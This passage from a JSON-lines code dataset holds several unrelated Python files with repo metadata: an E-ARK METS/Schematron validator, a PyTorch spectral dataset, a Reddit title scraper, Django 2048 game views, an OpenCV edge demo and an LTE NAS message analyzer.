os.path.join(rootpath, metspath[9:])\n # change self.rootpath to match any relative path found in the\n # current (subsequent) mets\n return relpath.rsplit('/', 1)[0], relpath\n return metspath.rsplit('/', 1)[0], metspath\n\ndef _q(_ns, _v):\n return '{{{}}}{}'.format(_ns, _v)\n\nclass ValidationRules():\n \"\"\"Encapsulates 
a set of Schematron rules loaded from a single file.\"\"\"\n REP_SKIPS = [\n 'CSIP10',\n 'CSIP11',\n 'CSIP12',\n 'CSIP13',\n 'CSIP14',\n 'CSIP15',\n 'CSIP16',\n 'CSIP101',\n 'CSIP114'\n ]\n def __init__(self, name: str, rules_path: str=None):\n \"\"\"Initialise a set of validation rules from a file or name.\n\n Retrieve a validation profile by type and version # noqa: E501\n\n :param name: The name of the rule set once loaded. If no path is provided\n this param will be compared to the standard set of rules and\n a matching rule set will be loaded if found. For reference the\n standard ruleset corresponds to the different METS file sections\n i.e. amd, dmd, file, hdr, root, structmap\n :type type: str\n :param rules_path: A complete path to a set of schematron rules to load\n :type version: str\n \"\"\"\n self.name = name\n if not rules_path:\n # If no path is provided use the name param to try to load a standard ruleset\n rules_path = str(files(SCHEMATRON).joinpath('mets_{}_rules.xml'.format(name)))\n self.rules_path = rules_path\n logging.debug(\"path: %s\", self.rules_path)\n # Load the schematron file from the path\n self.ruleset = Schematron(file=self.rules_path, store_schematron=True, store_report=True)\n\n def get_assertions(self):\n \"\"\"Generator that returns the rules one at a time.\"\"\"\n xml_rules = etree.XML(bytes(self.ruleset.schematron))\n\n for ele in xml_rules.iter():\n if ele.tag == SCHEMATRON_NS + 'assert':\n yield ele\n\n def validate(self, to_validate):\n \"\"\"Validate a file against the loaded Schematron ruleset.\"\"\"\n xml_file = etree.parse(to_validate)\n self.ruleset.validate(xml_file)\n\n def get_report(self, struct, rep_skips=False):\n \"\"\"Get the report from the last validation.\"\"\"\n xml_report = etree.XML(bytes(self.ruleset.validation_report))\n messages = []\n rule = None\n status = MetadataStatus.VALID\n for ele in xml_report.iter():\n if ele.tag == SVRL_NS + 'fired-rule':\n rule = ele\n elif ele.tag == SVRL_NS + 'failed-assert':\n rule_id = ele.get('id', '')\n if self._skip_assertion(rule_id, struct, rep_skips):\n continue\n test_status, test_result = self._process_ele(rule_id, rule, ele)\n if test_status == MetadataStatus.NOTVALID:\n status = MetadataStatus.NOTVALID\n messages.append(test_result)\n\n return MetadataChecks(status=status, messages=messages)\n\n def _skip_assertion(self, rule_id, struct, rep_skips):\n if rep_skips and rule_id in self.REP_SKIPS:\n return True\n if rule_id == 'CSIP60' and not struct.has_documentation():\n return True\n if rule_id == 'CSIP88' and not struct.has_metadata():\n return True\n if rule_id in ('CSIP97', 'CSIP113') and not struct.has_schemas():\n return True\n if rule_id == 'CSIP114' and not struct.has_representations():\n return True;\n return False\n \n def _process_ele(self, rule_id, rule, ele):\n status = MetadataStatus.VALID\n severity = Severity.WARN\n if ele.get('role') == 'ERROR':\n severity = Severity.ERROR\n status = MetadataStatus.NOTVALID\n elif ele.get('role') == 'INFO':\n severity = Severity.INFO\n return status, TestResult(\n rule_id=rule_id,\n location=rule.get('context').replace('/*[local-name()=\\'', '') +\n '/' + ele.get('test'),\n message=ele.find(SVRL_NS + 'text').text,\n severity=severity\n )\n\nclass ValidationProfile():\n \"\"\" A complete set of Schematron rule sets that comprise a complete validation profile.\"\"\"\n NAMES = {\n 'root': 'METS Root',\n 'hdr': 'METS Header',\n 'amd': 'Adminstrative Metadata',\n 'dmd': 'Descriptive Metadata',\n 'file': 'File Section',\n 'structmap': 
'Structural Map'\n }\n SECTIONS = NAMES.keys()\n\n def __init__(self):\n self.rulesets = {}\n self.is_valid = False\n self.results = {}\n self.messages = []\n for section in self.SECTIONS:\n self.rulesets[section] = ValidationRules(section)\n\n def validate(self, to_validate, structure, is_root=True):\n \"\"\"Validates a file against each loaded ruleset.\"\"\"\n is_valid = True\n self.results = {}\n self.messages = []\n for section in self.SECTIONS:\n try:\n self.rulesets[section].validate(to_validate)\n except etree.XMLSyntaxError as parse_err:\n self.is_valid = False\n self.messages.append(parse_err.msg)\n continue\n self.results[section] = self.rulesets[section].get_report(structure, not is_root)\n if self.results[section].status != MetadataStatus.VALID:\n is_valid = False\n self.is_valid = is_valid\n messages = []\n status = MetadataStatus.VALID\n for _, result in self.results.items():\n messages+=result.messages\n if result.status == MetadataStatus.NOTVALID:\n status = MetadataStatus.NOTVALID\n return status == MetadataStatus.VALID, MetadataChecks(status=status, messages=messages)\n\n def get_details(self):\n \"\"\"Return the valiation profile details.\"\"\"\n return ProfileDetails(name='E-ARK Specification for Information Packages',\n type='SIP', version='2.0.4')\n\n def get_results(self):\n \"\"\"Return the full set of results.\"\"\"\n return self.results\n\n def get_result(self, name):\n \"\"\"Return only the results for element name.\"\"\"\n return self.results.get(name)\n\ndef validate_ip(to_validate, struct_map):\n # Schematron validation profile\n schema_results = {}\n schematron_results = {}\n mets_files = {}\n validator = MetsValidator(to_validate)\n mets_path = os.path.join(to_validate, METS_FILENAME)\n results = validator.validate_mets(mets_path)\n schema_results['root'] = results\n mets_files['root'] = validator.file_refs\n for key, file_ref in validator.represent_mets.items():\n print('METS_KEY: ', key, \", REF: \", file_ref)\n rep_validator = MetsValidator(file_ref.path)\n schema_results[key] = rep_validator.validate_mets(os.path.join(to_validate,\n file_ref.path))\n mets_files[key] = rep_validator.file_refs\n profile = ValidationProfile()\n schematron_results['root'] = profile.validate(mets_path, struct_map['root'])\n all_schm_status = MetadataStatus.VALID\n all_schm_mssg = []\n all_schmtrn_status = MetadataStatus.VALID\n all_schmtrn_mssg = []\n for key, (schema_valid, results) in schema_results.items():\n all_schm_mssg+=results.messages\n print('Checking METS validation: ', key)\n if schema_valid:\n print('Schema validation succeeded for: ', key)\n if key == 'root':\n print('root METS schematron: ')\n schematron_valid, schematron_result = schematron_results['root']\n else:\n mets_ref = validator.represent_mets[key]\n schematron_valid, schematron_result = profile.validate(os.path.join(to_validate,\n mets_ref.path),\n struct_map[key], False)\n if not schematron_valid:\n all_schmtrn_status = MetadataStatus.NOTVALID\n all_schmtrn_mssg+=schematron_result.messages\n else:\n all_schm_status = MetadataStatus.NOTVALID\n all_schmtrn_status = MetadataStatus.NOTVALID\n manifest_errors = _check_manifest(to_validate, mets_files)\n if manifest_errors:\n all_schmtrn_status = MetadataStatus.NOTVALID\n all_schmtrn_mssg+=manifest_errors\n\n return profile.get_details(), MetadataResults(MetadataChecks(all_schm_status,\n all_schm_mssg),\n MetadataChecks(all_schmtrn_status,\n all_schmtrn_mssg))\n\ndef _check_manifest(to_validate, mets_refs):\n algs = set()\n for refs in 
mets_refs.values():\n for ref in refs:\n if ref.checksum:\n algs.add(ref.checksum.algorithm)\n manifest = MNFST.manifest_from_directory(to_validate, checksum_algs=algs)\n return _get_manifest_errors(mets_refs, manifest)\n\ndef _get_manifest_errors(mets_refs, manifest):\n errors = []\n for key, refs in mets_refs.items():\n for file_ref in refs:\n errors += _proc_file_ref(file_ref, key, manifest)\n return errors\n\ndef _proc_file_ref(file_ref, key, manifest):\n errors = []\n ref_path = str(file_ref.path) if key == 'root' else os.path.join('representations',\n key,\n str(file_ref.path))\n for entry in manifest.entries:\n if entry.path == ref_path:\n errors += _check_manifest_entry(entry, file_ref, key)\n return errors\n\ndef _check_manifest_entry(entry, file_ref, key):\n errors = []\n if str(entry.size) != str(file_ref.size):\n errors.append(TestResult('CSIP69',\n 'mets/fileSec/fileGrp/file/@SIZE',\n 'mets/fileSec/fileGrp/file/@SIZE: {} declared in {} {} '\n 'and size of file {}: {} isn\\'t equal.'.format(file_ref.size,\n key,\n entry.path,\n entry.size,\n METS_FILENAME),\n Severity.ERROR))\n checksum_matched = False\n if file_ref.checksum:\n for checksum in entry.checksums:\n if file_ref.checksum and checksum == file_ref.checksum:\n checksum_matched = True\n if not checksum_matched:\n errors.append(TestResult('CSIP71',\n 'mets/fileSec/fileGrp/file/@CHECKSUM',\n 'mets/fileSec/fileGrp/file/@CHECKSUM: {} declared in {} {} '\n 'and checksum of file {} isn\\'t equal.'.format(file_ref.checksum.value,\n key,\n entry.path,\n METS_FILENAME),\n Severity.ERROR))\n return errors\n ","repo_name":"carlwilson/eark-ip","sub_path":"eark_ip_valid/eark_ip/api/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":17631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14576376908","text":"# https://dgsw.goorm.io/exam/132233/%EC%BD%94%EB%94%A9%ED%85%8C%EC%8A%A4%ED%8A%B81/quiz/12 #\n\ndef sort1(s):\n #리스트 컴프리헨션\n s1=[a for a in s if a<0] #음수\n s2=[b for b in s if b>=0] #양수\n return s1+s2\n\nli=list(map(int,input().split()))\nr=sort1(li)\nprint(*r)","repo_name":"oheunji05/Coding-test","sub_path":"Python/이상한 정렬.py","file_name":"이상한 정렬.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2958694723","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPerforms fetch.py on these time settings\n\"\"\"\n\nfrom crontab import CronTab\n#init cron\ncron = CronTab()\n\n#add new cron job\njob = cron.new(command='fetch.py')\n\n#job settings\njob.hour.every(4)\n","repo_name":"colmoneill/Jason-Scraper","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30643937945","text":"import torch \nimport numpy as np \nimport pandas as pd \nimport h5py\nfrom torch.utils.data.dataset import Dataset\n\nclass Pixel2PixelDataset(Dataset):\n\n def __init__(self, dir_name, image_names=['minos'], sample_step = 1, device='cuda', band_range=(80, 2128), \n target_elems=['S_K','K_K','Ca_K','Cr_K','Mn_K','Fe_K','Cu_K','Zn_K','Sr_K','Au_L','Hg_L','Pb_L'] ): \n\n self.dir_name = dir_name\n self.image_names = image_names\n self.sample_step = sample_step\n self.device = device\n self.band_min, self.band_max = band_range\n self.target_elems = target_elems\n self.X = []; self.y = []\n\n self.train_spec_files = 
[self.dir_name + '/spec/' + x + '.hdf5' for x in self.image_names]\n self.train_elem_files = [self.dir_name + '/elem_maps/' + x +'.dat' for x in self.image_names]\n\n ## Initialize Train and Validation datasets\n for i_spec, spec_file in enumerate(self.train_spec_files):\n\n ## Open spectral image file\n f = h5py.File(spec_file, 'r')\n spec_image = f['Experiments/__unnamed__/data'][()] # numpy.ndarray \n f.close()\n spec_image = spec_image.reshape(\n spec_image.shape[0]*spec_image.shape[1], spec_image.shape[2]\n )\n spec_image = spec_image[:,self.band_min:self.band_max]\n \n ## Open target image file (elemental_maps)\n target_file = spec_file.replace(\"spec\", \"elem_maps\")\n target_file = target_file.replace(\"hdf5\", \"dat\")\n df = pd.read_csv(target_file , sep=' ', engine='python')\n target_image = np.array(df[self.target_elems])\n\n ## Keep a subset of spectra dataset (default: 10%)\n for idx, spectra in enumerate(spec_image):\n if(idx % self.sample_step == 0):\n x = np.expand_dims(spectra, axis=0).astype(np.float32)\n x = torch.tensor(x)\n self.X.append(x)\n y = torch.tensor(target_image[idx].astype(np.float32))\n self.y.append(y)\n\n def __getitem__(self, index):\n x_in, y_in = self.X[index], self.y[index]\n return x_in.to(self.device), y_in.to(self.device)\n\n def __len__(self):\n return len(self.X)\n\n\nif __name__ == \"__main__\":\n directory = '/home/igeor/MSC-THESIS/data/h5'\n dataset = Pixel2PixelDataset(directory, sample_step=10, device='cuda', band_range=(80, 2128), \n image_names=['gogo', 'saintjohn', 'dionisios', 'fanourios', 'odigitria', 'minos'])\n \n from torch import nn \n fcn = nn.Sequential(\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Linear(512, 64),\n nn.ReLU(),\n nn.Linear(64, 12)\n ).to('cuda')\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True)\n optimizer = torch.optim.Adam(fcn.parameters(), lr=0.01)\n\n for epoch in range(100):\n epoch_loss = 0.0\n for x, y in dataloader:\n y_hat = fcn(x)\n loss = nn.MSELoss()(y_hat, y)\n epoch_loss += loss.item() / len(dataloader)\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n print(f'Epoch: {epoch} | Loss: {epoch_loss}')\n","repo_name":"igeor/Elemental-Distribution-Mapping-with-Deep-Learning-Methods","sub_path":"Elemental_Mapping/datasets/Pixel2PixelDataset.py","file_name":"Pixel2PixelDataset.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27904479603","text":"import json\r\nimport praw \r\nfrom WriteToTXT import WriteToTxt\r\nimport threading\r\n\r\n# TODO: Idea is to scrape all the titles and upvotes for each title and make some calculation to buy or ignore/sell a stock\r\n# TODO: change csv file to txt file\r\n\r\nuser_agent = \"Scraper 1.0 by /u/Constant-Yam531\"\r\n\r\n#stock_ticker_mention_count = 0\r\n#stock_ticker = input(\"What stock do you want to SCRAPE?: \")\r\n\r\ncredentials = 'client_secrets.json'\r\n\r\nwith open(credentials) as f:\r\n creds = json.load(f)\r\n\r\nreddit = praw.Reddit(\r\n client_id = creds['client_id'],\r\n client_secret = creds['client_secret'],\r\n user_agent = creds['user_agent'],\r\n redirect_uri = creds['redirect_uri']\r\n)\r\n\r\ndef newPosts(): \r\n threading.Timer(5.0,newPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n #print(previous_submission_title)\r\n\r\n headlines = set()\r\n for submission in 
reddit.subreddit('wallstreetbets').new(limit=1):\r\n #print(submission.title)\r\n #print(submission.id)\r\n #print(submission.author)\r\n #print(submission.created_utc)\r\n #print(submission.score)\r\n #print(submission.upvote_ratio)\r\n #print(submission.url)\r\n #break\r\n #print(submission.title)\r\n headlines.add(submission.title)\r\n\r\n # Don't need this in new but do it for hot and top\r\n # the_submission = reddit.submission(submission.id)\r\n # the_submission.comments.replace_more(limit=None)\r\n # for comment in the_submission.comments.list():\r\n # print(comment.body)\r\n\r\n #submission_title = submission.title\r\n #print(submission.title)\r\n #print(submission_title)\r\n print(submission.title)\r\n PleaseWriteToTXT = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n\r\n if(submission.title != previous_submission_title):\r\n PleaseWriteToTXT.append_to_csv(submission.title)\r\n\r\ndef topPosts(): \r\n threading.Timer(5.0,topPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n headlines = set()\r\n for submission in reddit.subreddit('wallstreetbets').top(limit=1):\r\n headlines.add(submission.title)\r\n\r\n print(submission.title)\r\n PleaseWriteToCSV = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n\r\n if(submission.title != previous_submission_title):\r\n PleaseWriteToCSV.append_to_csv(submission.title)\r\n\r\ndef hotPosts(): \r\n threading.Timer(5.0,hotPosts).start()\r\n with open('wsbnew.csv', 'r') as f:\r\n for line in f:\r\n pass\r\n last_line = line\r\n previous_submission_title = last_line\r\n\r\n #headlines = set()\r\n headlines = {\r\n\r\n }\r\n\r\n count = 0\r\n for submission in reddit.subreddit('wallstreetbets').hot(limit=100):\r\n #headlines[submission.title] = submission.score\r\n headlines[count] = [submission.title,submission.score]\r\n count = count + 1\r\n #headlines.add(submission.title)\r\n\r\n #print(submission.title)\r\n #print(list(headlines)[10])\r\n #print(headlines)\r\n PleaseWriteToTXT = WriteToTxt()\r\n\r\n #filename = 'wsbnew.csv'S\r\n print(headlines[0][1])\r\n count = 0\r\n while(count < 100):\r\n PleaseWriteToTXT.append_to_txt(headlines[count][0])\r\n count = count + 1\r\n \r\n\r\nhotPosts()\r\n#topPosts()\r\n# newPosts()\r\n\r\n# TO DO LATER: Go into the post and scrape the comments too. 
\r\n","repo_name":"ForMeCodingIsLikeTypeRacer/WSBTime","sub_path":"wsbtracker.py","file_name":"wsbtracker.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17081022497","text":"import copy\nimport json\nfrom django.shortcuts import render\nfrom game2048.lwgame.usl import GameConsoleView\n# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n\nfrom game2048.models import Top_ten\n\narray_new = [\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n ]\na = GameConsoleView(array_new)\n\ndef ht2048(request):\n # array = [[2, 8, 4, 2], [4, 32, 16, 8], [16, 128, 8, 2], [32, 2, 32, 16]]\n # 把新地图放入启动函数\n array = a.start(array_new)\n # print('start nadao map',array)\n\n # 后端处理cookie,失败,改用js处理\n # resp = render(request, 'ht2048.html', locals())\n # arr = []\n # for item in array:\n # i = [str(i) for i in item]\n # for c in i:\n # arr.append(c)\n #arr = json.dumps(array)\n #\"['4'\\054 '0'\\054 '2'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0'\\054 '0']\"\n #resp.set_cookie('arr', arr, 30 * 60 * 1000)\n\n return render(request, 'ht2048.html', locals())\n\ndef on(request):\n # print('这是 on ----------------')\n\n #拿到cook的值,转换成[[],[],[],[]]\n cook_arr = request.COOKIES.get('arr', '没有值!')\n cook_arr = cook_arr.split(',')[:16]\n cook_arr = [int(i) for i in cook_arr]\n array = []\n array.append(cook_arr[:4])\n array.append(cook_arr[4:8])\n array.append(cook_arr[8:12])\n array.append(cook_arr[12:16])\n print(array)\n\n # v1.2版本处理方案,深拷贝地图做到并发 ->失败(无法识别游览器用户) 解决方案(cookie)\n # array = arr_map()\n # print('nadao map',array)\n\n #将cookie拿到的值,传入逻辑函数处理\n if 'on' in request.GET.keys():\n on = request.GET['on']\n if on == 'up':\n array = a.update('w',array)\n elif on == 'down':\n array = a.update('s',array)\n elif on == 'left':\n array = a.update('a',array)\n elif on == 'right':\n array = a.update('d',array)\n\n if array[len(array)-1] == 'over':\n print('游戏结束')\n\n if array == '没有变化':\n res = {'val': array}\n print(res)\n return JsonResponse(res)\n\n num_array = copy.deepcopy(array)\n try:\n # 积分统计\n array = num(num_array)\n except Exception as e:\n print(e)\n print('按的太快了')\n\n res = {'val':array}\n print(res)\n return JsonResponse(res)\n\n# 添加排名\ndef top_ten_add(request):\n\n if request.method == 'GET':\n num = request.GET['num']\n num = int(num[:-1])\n name = request.GET['name']\n Top_ten.objects.create(nickname=name,result=num)\n\n return HttpResponse('ok')\n\n# 查看排名\ndef top_ten(request):\n\n print('topten ok')\n top_all = Top_ten.objects.order_by('-result')[:10]\n\n return render(request,'top_ten.html',locals())\n\n# 积分计算函数\ndef num(array):\n num = 0\n for i in array:\n for c in i:\n num += c\n array.append(num)\n return array\n\n\n# def arr_map():\n # num_array = copy.deepcopy(array)\n # return array_new\n\n# def arr_obj(array):\n#\n# array_new = array[0:3]\n#\n# return array_new","repo_name":"satori369/2048html","sub_path":"game2048/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70060973928","text":"import cv2 as cv\nimport sys\n\nimg = cv.imread(\"./img/dog.jpg\")\n\nif img is None:\n sys.exit(\"이미지를 불러올 수 없습니다\")\n\ngray = cv.cvtColor(img , cv.COLOR_BGR2GRAY)\n\ncanny1 = cv.Canny(gray, 50, 150)\ncanny2 = cv.Canny(gray, 100, 
200)\n\ncv.imshow(\"Original\" , gray)\ncv.imshow(\"Canny1\" , canny1)\ncv.imshow(\"Canny2\" , canny2)\n\ncv.waitKey()\ncv.destroyAllWindows()","repo_name":"Mkpong/ComputerVision","sub_path":"CV-4-1/Canny_edge.py","file_name":"Canny_edge.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72906160808","text":"#!/usr/bin/python\n# Filename: lte_nas_analyzer.py\n\"\"\"\n\nA LTE NAS layer (EMM/ESM) analyzer\n\nAuthor: Yuanjie Li\n Zengwen Yuan\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nfrom .analyzer import *\nfrom .state_machine import *\nimport timeit\n\nfrom .protocol_analyzer import *\nfrom .profile import Profile, ProfileHierarchy\n\nfrom .nas_util import *\n\n__all__=[\"LteNasAnalyzer\"]\n\n#EMM registeration state \nemm_state={0:\"deregistered\",1:\"registered\"}\n\n#EMM registeration substate \nemm_substate={\n 0: \"deregistered.normal_service\",\n 1: \"deregistered.limited_service\",\n 2: \"deregistered.attempting_to_attach\",\n 3: \"deregistered.plmn_search\",\n 4: \"deregistered.no_imsi\",\n 5: \"deregistered.attach_needed\",\n 6: \"deregistered.no_cell_available\",\n 7: \"registered.normal_service\",\n 8: \"registered.attempting_to_update\",\n 9: \"registered.limited_service\",\n 10: \"registered.plmn_search\",\n 11: \"registered.updated_needed\",\n 12: \"registered.no_cell_available\",\n 13: \"registered.attempting_to_update_mm\",\n 14: \"registered.imsi_detach_inited\"}\n\n#ESM session connection state\nesm_state={0:\"disconnected\", 1:\"connected\", -1:\"disconnected\"}\n\n# class LteNasAnalyzer(Analyzer):\nclass LteNasAnalyzer(ProtocolAnalyzer):\n\n \"\"\"\n A protocol analyzer for LTE NAS messages (EMM and ESM)\n \"\"\"\n\n def __init__(self):\n\n ProtocolAnalyzer.__init__(self)\n #init packet filters\n self.add_source_callback(self.__nas_filter)\n #EMM/ESM status initialization\n self.__emm_status = EmmStatus()\n self.__esm_status = {} #EPS ID -> EsmStatus()\n #####use EPS bearer ID or EPS bearer state????\n self.__cur_eps_id = None\n # self.__esm_status = EsmStatus()\n self.esm_state_machine = self.create_esm_state_machine()\n self.emm_state_machine = self.create_emm_state_machine()\n self.callflow_state_machine = self.create_callflow_state_machine()\n\n def create_profile_hierarchy(self):\n '''\n Return a Lte NAS ProfileHierarchy (configurations)\n\n :returns: ProfileHierarchy for LTE NAS\n '''\n return LteNasProfileHierarchy()\n\n def set_source(self,source):\n \"\"\"\n Set the trace source. 
Enable the LTE NAS messages.\n\n :param source: the trace source (collector).\n \"\"\"\n Analyzer.set_source(self,source)\n #Enable EMM/ESM logs\n source.enable_log(\"LTE_NAS_ESM_OTA_Incoming_Packet\")\n source.enable_log(\"LTE_NAS_ESM_OTA_Outgoing_Packet\")\n source.enable_log(\"LTE_NAS_EMM_OTA_Incoming_Packet\")\n source.enable_log(\"LTE_NAS_EMM_OTA_Outgoing_Packet\")\n source.enable_log(\"LTE_NAS_EMM_State\")\n source.enable_log(\"LTE_NAS_ESM_State\")\n\n def create_callflow_state_machine(self):\n \"\"\"\n Declare a callflow state machine\n\n returns: a StateMachine\n \"\"\"\n\n def idle_to_csfb(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n extended_service_req_flag = False\n for field in msg.data.iter('field'):\n if field.get('name') == 'nas_eps.nas_msg_emm_type' and field.get('value') == '4c':\n extended_service_req_flag = True\n elif extended_service_req_flag and field.get('name') == 'nas_eps.emm.service_type' \\\n and (field.get('show') == '0' or field.get('show') == '1'):\n return True\n\n\n def idle_to_volte(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n act_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n # print ET.dump(field)\n if field.get('name') == 'nas_eps.nas_msg_esm_type' and field.get('value') == 'c5':\n act_bearer_flag = True\n elif act_bearer_flag and field.get('show') == 'EPS quality of service':\n # print ET.dump(field)\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.emm.qci' and val.get('show') == '1':\n # print ET.dump(val)\n return True\n\n\n def con_to_volte(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n deact_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n if field.get('value') == 'cd': # Deactivate EPS bearer context request (0xcd)\n deact_bearer_flag = True\n elif deact_bearer_flag and field.get('show') == 'ESM cause':\n for val in field.iter('field'):\n if val.get('name') == 'nas_eps.esm.cause' and val.get('show') == '36':\n return True\n\n\n def csfb_to_idle(msg):\n if msg.type_id == 'LTE_NAS_EMM_State' and msg.data[\"EMM Substate\"] == 'EMM_REGISTERED_NORMAL_SERVICE':\n return True\n\n def volte_to_con(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n act_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n # print ET.dump(proto)\n for field in proto.iter('field'):\n if field.get('value') == 'c6': # Activate dedicated EPS bearer context accept (0xc6)\n act_bearer_flag = True\n # TODO: add check on bearer id\n return True\n\n def volte_to_idle(msg):\n if msg.type_id == 'LTE_NAS_EMM_State':\n return\n deact_bearer_flag = False\n for proto in msg.data.iter('proto'):\n if proto.get('name') == 'nas-eps':\n for field in proto.iter('field'):\n if field.get('value') == 'ce': # Deactivate EPS bearer context accept (0xce)\n deact_bearer_flag = True\n # TODO: add check on bearer id\n return True\n\n def init_state(msg):\n return 'IDLE'\n\n state_machine={'IDLE': {'CALL_FALLBACK': idle_to_csfb, 'VoLTE_PROCESSING': idle_to_volte},\n 'CONNECTED': {'VoLTE_PROCESSING': con_to_volte},\n 'CALL_FALLBACK': {'IDLE': csfb_to_idle},\n 'VoLTE_PROCESSING': {'CONNECTED': volte_to_con, 'IDLE': volte_to_idle}}\n\n return StateMachine(state_machine, init_state)\n\n\n def create_esm_state_machine(self):\n \"\"\"\n Declare a ESM state machine\n returns: a StateMachine\n \"\"\"\n\n def con_to_discon(msg):\n if 
int(msg.data[\"EPS bearer state\"]) - 1 == 0:\n return True\n\n def discon_to_con(msg):\n if int(msg.data[\"EPS bearer state\"]) - 1 == 1:\n return True\n\n def init_state(msg):\n if \"EPS bearer state\" not in msg.data:\n return \"ESM_DISCON\"\n elif int(msg.data[\"EPS bearer state\"]) - 1 == 0:\n return 'ESM_DISCON'\n elif int(msg.data[\"EPS bearer state\"]) - 1 == 1:\n return 'ESM_CON'\n\n state_machine = {'ESM_CON': {'ESM_DISCON': con_to_discon},\n 'ESM_DISCON': {'ESM_CON': discon_to_con}}\n\n return StateMachine(state_machine, init_state)\n\n\n def create_emm_state_machine(self):\n \"\"\"\n Declare a EMM state machine\n\n returns: a StateMachine\n \"\"\"\n\n def to_deregister(msg):\n if msg.data[\"EMM State\"] == 'EMM_DEREGISTERED':\n return True\n\n def to_deregister_init(msg):\n if msg.data[\"EMM State\"] == 'EMM_DEREGISTERED_INITIATED':\n return True\n\n def to_register(msg):\n if msg.data[\"EMM State\"] == 'EMM_REGISTERED':\n return True\n\n def to_register_init(msg):\n if msg.data[\"EMM State\"] == 'EMM_REGISTERED_INITIATED':\n return True\n\n def init_state(msg):\n if msg.data[\"EMM State\"] in ['EMM_REGISTERED', 'EMM_REGISTERED_INITIATED', 'EMM_DEREGISTERED',\n 'EMM_DEREGISTERED_INITIATED']:\n return msg.data[\"EMM State\"]\n\n state_machine={'EMM_REGISTERED': {'EMM_DEREGISTERED': to_deregister, 'EMM_DEREGISTERED_INITIATED': to_deregister_init},\n 'EMM_REGISTERED_INITIATED': {'EMM_REGISTERED': to_register, 'EMM_DEREGISTERED': to_deregister},\n 'EMM_DEREGISTERED': {'EMM_REGISTERED_INITIATED': to_register_init},\n 'EMM_DEREGISTERED_INITIATED': {'EMM_DEREGISTERED': to_deregister}}\n\n return StateMachine(state_machine, init_state)\n\n def __nas_filter(self,msg):\n \"\"\"\n Filter all NAS(EMM/ESM) packets, and call functions to process it\n\n :param msg: the event (message) from the trace collector.\n \"\"\"\n\n if msg.type_id == \"LTE_NAS_ESM_OTA_Incoming_Packet\" \\\n or msg.type_id == \"LTE_NAS_ESM_OTA_Outgoing_Packet\" \\\n or msg.type_id == \"LTE_NAS_EMM_OTA_Incoming_Packet\" \\\n or msg.type_id == \"LTE_NAS_EMM_OTA_Outgoing_Packet\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n\n # if not log_item_dict.has_key('Msg'):\n if 'Msg' not in log_item_dict:\n return\n\n #Convert msg to xml format\n # log_xml = ET.fromstring(log_item_dict['Msg'])\n log_xml = ET.XML(log_item_dict['Msg'])\n xml_msg=Event(msg.timestamp,msg.type_id,log_xml)\n\n # print log_item_dict['Msg']\n\n # self.__callback_emm_state(xml_msg)\n self.__callback_emm(xml_msg)\n self.__callback_esm(xml_msg)\n\n self.send(msg)\n\n if msg.type_id == \"LTE_NAS_EMM_State\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n\n raw_msg = Event(msg.timestamp,msg.type_id,log_item_dict)\n self.__callback_emm_state(raw_msg)\n if self.emm_state_machine.update_state(raw_msg):\n self.log_info(\"EMM state: \" + str(self.emm_state_machine.get_current_state()))\n\n self.send(msg)\n\n if msg.type_id == \"LTE_NAS_ESM_State\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n raw_msg = Event(msg.timestamp,msg.type_id,log_item_dict)\n self.__callback_esm_state(raw_msg)\n if self.esm_state_machine.update_state(raw_msg):\n self.log_info(\"ESM state: \" + self.esm_state_machine.get_current_state())\n\n self.send(msg)\n\n def __callback_emm_state(self,msg):\n \"\"\"\n Given the EMM message, update EMM state and substate.\n\n :param msg: the NAS signaling message that carries EMM state\n \"\"\"\n self.__emm_status.state = msg.data[\"EMM State\"]\n self.__emm_status.substate = msg.data[\"EMM 
